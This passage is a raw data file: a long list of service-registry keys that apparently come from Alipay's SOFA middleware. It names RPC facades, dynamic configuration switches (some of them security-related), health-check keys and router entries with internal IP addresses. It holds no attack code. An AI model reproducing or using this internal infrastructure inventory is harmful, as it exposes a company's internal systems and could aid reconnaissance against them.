INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditcore.factor.service.FactorQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.msg.PublicNotifyInfoMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxlib.core.sample.service.KeywordCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.graycore.changesdk.ops.OpsCallback:1.0:graycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.116.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.channelspop.service.solution.activity.facade.ActivityServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.23.240.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.scardcenter.common.service.facade.OfflinepayConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.core.service.drm.MacDRMResource.appTaskCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecashier.service.facade.AutoPayCashierFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.common.ipromo.mobilerpc.facade.service.AppleJuiceSceneContentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.bizindicator.BizIndicatorRecordValueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.EventConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_ALI_TP_S_BC_TPP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.contentfusion.common.service.facade.contentfusion.CategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.immunemng.facade.ImmAllSolutionFacade:1.0:bkcheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imaspmng_cardSceneEditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.ShortCodeBackgroundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pamir.login.PamLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.activity.CustActivityManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cloud.apfasmng.common.service.facade.confreg.ConfregClientFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secuinfos.common.service.facade.article.SecuinfosFeedFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.market.UniMarketCampOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@pcreditauthprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mobilerelation.common.service.facade.tlou.TlouCustomizedBizQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.icontrol.common.service.facade.dispatch.IcVdnDispatchConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkloandecision.service.facade.agds.GeneralNameListOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authcenter.service.facade.PlatformOauthServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.exterface.ExterfaceTemporaryFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.degradeImatch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cdp.common.service.facade.space.api.CdpSpaceApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.hitchqualitative.UsabilityDecisionModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayProjectLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.xviewcore:name=com.alipay.xview.core.common.drm.CacheConsistSwitch.cityPutConsistGroupNameStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmMntListConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finscprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:reading@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.17.166.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.punishcenter.common.service.facade.action.ActionService:1.0:signatureRemoveService@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.21.90.218#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:imobileprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.model.monitor.MdpWarnConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.loginsession.service.SessionToolFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.commom.manage.facade.transfer.api.PointTransferBatchDetailService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.solpromo.facade.api.mng.SceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.24.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mshopprod.common.service.facade.territory.TerritoryShopManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.exporterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.migrate.drm.SceneMigrateTaskDrm.historyDataScanTaskOrderLoadMaxNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.core.config.cache.service.MinitransOSSConnectionCache:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.spread.FollowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_GUARCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.baitiaoprod:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.api.InvestAdviserProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.industry.IndusPoolBinRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iglobalfundcontrol.facade.api.fundout.FundOutRouterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.80.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.bpaas.ecomerchant.facade.auth.admin.AuthQueryAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.tsm.common.service.facade.rpc.spi.TsmRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.agdsmng.common.service.facade.oss.OssClientManager:1.0:bkMngOssClientManagerService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kujuta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aeicore.common.service.facade.BalAssetDerivativeConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.subscribe.api.CrowdRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.130.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.workflowxTBaseCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_qagraphknowledge_flux_collect#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.decisionx.facade.api.DxRouterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:ebppprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.admin.ExternalReferenceContentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.AbTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.module.InsIopDashBoardMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.product.transfer.FundDataTransferFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instriskcenter.facade.api.RiskNotifyConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CertBindingQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.guardianWaterMark,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_finsteward_schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zpaascoreng.facade.ops.PodUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.biz.direct.antq.AntqDispatchPullConsumer:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rcreportcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vehownerprod.facade.admin.EtcFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.OuterDataQueryService:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.StuffQrcodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetStockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbaudit.common.service.facade.bff.AuditBffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dockerlabapp:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscheck.service.facade.api.FRProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.manager.AppConfManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:creditutcoreAssetPrepareService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.runtime.ServerlessSpecFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.publichome.common.service.facade.life.LifePublicBizServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imif.common.service.facade.v2.ShopQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopengw.component.communication.httpserver.HttpServerInstanceManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentfactory.common.service.facade.preprocess.TaskExecutorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.210.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.crsociety.api.DependencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.alphasec.compass.operating.facade.service.MigrateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.maxPerLoading,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointcore.common.mpoint.facade.MpointDrawbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opinioncore.facade.spider.YqSpiderSearchConfigManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.shared.manager.drm.MbaasDRMImpl.restApisecurityCheckDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.air.service.facade.RecService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opscloudcore.common.service.facade.execute.HeartbeatCheck:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.instasset.common.service.facade.AssetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbcateringprod.common.service.facade.item.api.CaterDishItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ifim.biz.cqc.manager.BBCRuleRunAnalysis:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.recommend.LifeReportScheduleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.CreditAgreementClientSwitch.shadowSwtichToRpc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:fundprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.MessageSpi:1.0:mdeviceprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pamir.operator.PamOperatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.minDiscountAmt,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insbffweb:name=com.alipay.insbffweb.chair.Config.isCloseVerify,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.creditacceptance.common.service.facade.CreditBillEvaluateRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msgbroker:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifin:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iprocess.sip.action.Action:1.0:ocrUpdateAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.facade.icon.IconService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYJSESSIONID.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gotonemng.common.service.api.SmsLineSwitchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoaftermarket.common.service.order.AutoServiceInspectionFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:dmpservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cxbizruntime@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.facade.alarmanalysis.ExperienceSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insautomarket.common.facade.oil.AutoMktOilIdentityFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.listen.iot.handler.IotThingShadowHandler:1.0:iotDeviceInfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:inscontent_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.katongprod.signcenter.service.read.FirstPaySignDataQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_FINSUPPORT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.102.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqualitywalleetoe.common.util.kmi.KmiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.IBatchInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:autoaftermarketProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=cn.com.antcloud.common.auth.client.config.ZauthMigrationDrmConfigTrigger.migrationActionMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.242.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.33.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.admin.AppTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intl.idataops.antc.AncKeplerClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.alipayauth.AlipayAuthUserCompanyServiceFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.reverseapply.AssetReverseApplyOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:unitestcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.136.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.126.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundselling.share.query.TransactionAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYJSESSIONID.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.176.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appstore.common.service.facade.commodity.BumngIsvInfoManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custassetTBaseCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.common.OperationActivityInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.biz.shared.feature.detect.DetectItemCheck:1.0:usabilityDetectItemCheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.242.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hainaprod.common.service.facade.api.mini.market.UniMarketAdminCampOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.demo.rpc.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mpaasweb.common.service.facade.replays.FunctionDataSourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bumng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.customscenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fcprodbx-insmobile:name=com.alipay.fc.prodbx.common.drm.impl.DrmResourceServiceImpl.cacheHitDigestLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.primaryTypeZmGraySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanElectronicSignatureCmd.data,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:btofficeapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.adapter.SolutionSimpleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:smartscene@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.finpwm.mobileDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hyp.common.service.facade.distribute.GroupDistributeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@apigw#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.financeprod.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promodmp.service.facade.asset.BizRuleRelationManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linepay.common.serivce.facade.slip.operator.SlipCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:ar-condition-check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.merchant.admin.MerchantAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.biz.shared.activity.drm.SceneActivityDrm.starWishWhiteUserIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.policy.api.QueryValidateProductRepositoryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.token.TerminalUserTokenService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.CompanyMainOperIncomeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ialicore:name=com.ipay.ialicore.common.drm.RegionStatusSwitch.grayUsers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.common.service.community.CommunityPunishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.236.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.chaos.dig.facade.zerodivisor.ZeroDivisorAttackFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.ap.bizprod.common.service.facade.api.OTPVerificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fintradecenter.common.service.facade.trade.accountgold.CommoditiesTransferOrderOperateShadowFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.PlanQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acparamcore.facade.api.DataBranchFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.frgcenter.common.service.facade.api.CategoryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.AuthFieldAdminFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmeteragecore.common.service.facade.back.MeterDomainConfigService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.filex.staging.StagingFileFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.riskmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlExtEscapeRuleString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.feed.api.FeedInboxAsyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.ServerLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashiercore.service.facade.spi.CashierCoreBizCallbackService:1.0:escrowexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.service.impl.test.LoadTestDebug:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.PermissionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanDecisionSwitchDrm.openNewDecision,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.meshysale.common.service.facade.assets.card.AssetsCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_STREAM_SERVERLESS_DATAFLOW_GBASE_ODPS_SECURITY@DEFAU